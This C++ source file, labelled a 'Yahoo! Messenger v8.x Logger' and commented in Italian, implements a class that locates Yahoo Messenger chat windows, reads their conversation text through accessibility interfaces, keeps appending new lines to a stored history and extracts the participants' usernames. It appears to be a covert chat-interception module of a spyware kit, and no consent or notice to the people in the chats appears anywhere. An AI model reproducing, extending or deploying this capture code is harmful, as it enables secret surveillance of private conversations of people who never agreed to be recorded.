/*
* Yahoo! Messenger v8.x Logger
*
* Coded by: Quequero
* Date: 14/Mar/2008
*
*/

#include <exception>
#include <new>

using namespace std;

#include "QYim8.h"

#define MIN_SEARCH_LENGTH 200

PWCHAR QYim8::wChatTree[] = {
	L"YSearchMenuWndClass",
	L"IMClass",
	L"YHTMLContainer",
	L"Internet Explorer_Server",
	0
};

PWCHAR QYim8::wChatUserListTree[] = {
	L"YSearchMenuWndClass",
	L"IMClass",
	L"SysListView32",
	0
};

QYim8::QYim8(HWND hw) : QYim7(hw)
{
	WCHAR wTopic[256];

	hwChat = ole.GetHandleFromClass(wChatTree);
	hwUserList = ole.GetHandleFromClass(wChatUserListTree);

	if(GetWindowText(hw, wTopic, 256))
		properties.SetId(wTopic);
	else
		properties.SetId(L"");
}

QYim8::~QYim8()
{

}

BOOL QYim8::GrabHistory()
{
	LONG uLines, i, uIndex;
	BSTR bChat = NULL;
	PWCHAR wTmp = NULL;

	if(!IsWindow(ole.GetHandle()))
		return FALSE;

	if(hwChat == NULL)
		return FALSE;

	ole.SetHandle(hwChat);

	if(ole.SetInterface() == FALSE){
		ole.Clean();
		return FALSE;
	}

	if(ole.SetYimRecursiveInterface() == FALSE){
		ole.Clean();
		return FALSE;
	}

	uIndex = uLines = ole.RecursiveTypeCountFromYi(NULL, ROLE_SYSTEM_TEXT);

	if(uLines == -1 || uLines == 0){
		ole.Clean();
		return FALSE;
	}

	// A volte... Casualmente a quanto pare, YIM accoda alla lista una
	// riga vuota contenente solo uno spazio... Se lo troviamo facciamo
	// in modo di skipparlo.
	if(ole.GetYimSpecificLineFromContainer(NULL, &bChat, uLines - 1, ROLE_SYSTEM_TEXT) == FALSE || bChat == NULL){
		SysFreeString(bChat);
		properties.SetUpdated(FALSE);
		ole.Clean();
		return FALSE;
	}

	if(wcslen(bChat) == 1 && !wcsncmp(bChat, L" ", 1))
		uLines -= 1;

	SysFreeString(bChat);
	bChat = NULL;

	uIndex = uLines;

	if(uLines < 1){
		ole.Clean();
		return FALSE;
	}

	// Se e' il primo grab di questo oggetto, prendi solo l'ultima
	// riga, in questo modo skippiamo tutta la history precedente.
	if(bFirstGrab){
		if(ole.GetYimSpecificLineFromContainer(NULL, &bChat, uIndex - 1, ROLE_SYSTEM_TEXT) == FALSE || bChat == NULL){
			SysFreeString(bChat);
			bChat = NULL;
			properties.SetUpdated(FALSE);
			ole.Clean();
			return FALSE;
		}

		if(properties.SetHistory(bChat)){
			properties.SetUpdated(TRUE);
		}

		SysFreeString(bChat);
		bChat = NULL;

		bFirstGrab = FALSE;
		ole.Clean();
		return TRUE;
	}

	// Se siamo qui, non e' il primo grab
	// Pulisci la history se e' gia' stata acquisita
	if(properties.GetAcquiredStatus()){
		properties.CleanHistory();

		// Cerca l'ultima riga della chat che abbiamo nella nostra history
		for(i = uLines; i > 0; i--){
			if(ole.GetYimSpecificLineFromContainer(NULL, &bChat, i - 1, ROLE_SYSTEM_TEXT) == FALSE || bChat == NULL){
				SysFreeString(bChat);
				bChat = NULL;
				properties.SetUpdated(FALSE);
				ole.Clean();
				return FALSE;
			}

			if(properties.CompareLastLine(bChat)){
				uIndex = i;
				break;
			}

			SysFreeString(bChat);
			bChat = NULL;
		}

		SysFreeString(bChat);
		bChat = NULL;

		// Se c'e' qualche riga da acquisire, possiamo cancellare la history
		if(uIndex < uLines)
			properties.ClearHistory();

		// Se i e' uguale a uLines, non ci sono nuove righe, quindi torniamo
		for(i = uIndex; i < uLines; i++){
			if(ole.GetYimSpecificLineFromContainer(NULL, &bChat, i, ROLE_SYSTEM_TEXT) == FALSE || bChat == NULL){
				SysFreeString(bChat);
				bChat = NULL;
				properties.SetUpdated(FALSE);
				ole.Clean();
				return FALSE;
			}

			if(properties.AppendHistory(bChat))
				properties.SetUpdated(TRUE);

			SysFreeString(bChat);
			bChat = NULL;
		}
	}else{ // Parti dall'ultima riga e confronta
		// Cerca l'ultima riga della chat che abbiamo nella nostra history
		for(i = uLines; i > 0; i--){
			if(ole.GetYimSpecificLineFromContainer(NULL, &bChat, i - 1, ROLE_SYSTEM_TEXT) == FALSE || bChat == NULL){
				SysFreeString(bChat);
				bChat = NULL;
				properties.SetUpdated(FALSE);
				ole.Clean();
				return FALSE;
			}

			if(properties.CompareLastLine(bChat)){
				uIndex = i;
				break;
			}

			SysFreeString(bChat);
			bChat = NULL;
		}

		SysFreeString(bChat);
		bChat = NULL;

		// Se i e' uguale a uLines, non ci sono nuove righe, quindi torniamo
		for(i = uIndex; i < uLines; i++){
			if(ole.GetYimSpecificLineFromContainer(NULL, &bChat, i, ROLE_SYSTEM_TEXT) == FALSE || bChat == NULL){
				SysFreeString(bChat);
				bChat = NULL;
				properties.SetUpdated(FALSE);
				ole.Clean();
				return FALSE;
			}

			if(properties.AppendHistory(bChat))
				properties.SetUpdated(TRUE);

			SysFreeString(bChat);
			bChat = NULL;
		}
	}

	ole.Clean();
	return TRUE;
}

BOOL QYim8::GrabTopic()
{
	WCHAR wTopic[256] = {0};

	ole.SetHandle(hwMain);

	if(GetWindowText(ole.GetHandle(), wTopic, 256))
		properties.SetId(wTopic);
	else
		properties.SetId(L"");

	return TRUE;
}

/**
* Prende l'elenco dei partecipanti e lo mette nelle proprieta'.
*/
BOOL QYim8::GrabUserList()
{
	UINT uLen, i;
	BSTR bUser;
	BOOL bRes;
	WCHAR wTopic[256] = {0}, wUser[256] = {0};
	PWCHAR pwMark;

	properties.ClearUsersList();

	if(hwUserList == NULL)
		hwUserList = ole.GetHandleFromClass(wChatUserListTree);

	// Se non c'e' il pannellino laterale, prova ad estrarre l'username
	// del nostro interlocutore dal titolo della finestra
	if(hwUserList == NULL){
		if(GetWindowText(hwMain, wTopic, 256)){
			pwMark = wcsstr(wTopic, L" --");

			if(pwMark){
				wcsncpy_s(wUser, 255, wTopic, (INT)(pwMark - wTopic));
				properties.AppendUser(wUser, FALSE);
				return TRUE;
			}
			
			pwMark = wcsstr(wTopic, L" -");

			if(pwMark){
				wcsncpy_s(wUser, 255, wTopic, (INT)(pwMark - wTopic));
				properties.AppendUser(wUser, FALSE);
				return TRUE;
			}else{
				pwMark = wcsstr(wTopic, L") - ");

				if(pwMark){
					wcsncpy_s(wUser, 255, wTopic, (INT)(pwMark - wTopic + 1));
					properties.AppendUser(wUser, FALSE);
					return TRUE;
				}
			}
		}else{
			return FALSE;
		}
	}

	ole.SetHandle(hwUserList);

	if(ole.SetYimUserListInterface(hwUserList) == FALSE){
		ole.Clean();
		return FALSE;
	}

	uLen = ole.GetYimTypeCount(ROLE_SYSTEM_LISTITEM);

	for(i = 0; i < uLen; i++){
		if(ole.GetYimSpecificLineFromContainer(NULL, &bUser, i, ROLE_SYSTEM_LISTITEM) == FALSE || bUser == NULL){
			if(i < uLen - 1)
				bRes = properties.AppendUser(L"", TRUE);
			else
				bRes = properties.AppendUser(L"", FALSE);

			continue;
		}

		if(i < uLen - 1)
			bRes = properties.AppendUser(bUser, TRUE);
		else
			bRes = properties.AppendUser(bUser, FALSE);

		SysFreeString(bUser);
		bUser = NULL;

		if(bRes == FALSE){
			ole.Clean();
			return FALSE;
		}
	}

	ole.Clean();
	return TRUE;
}

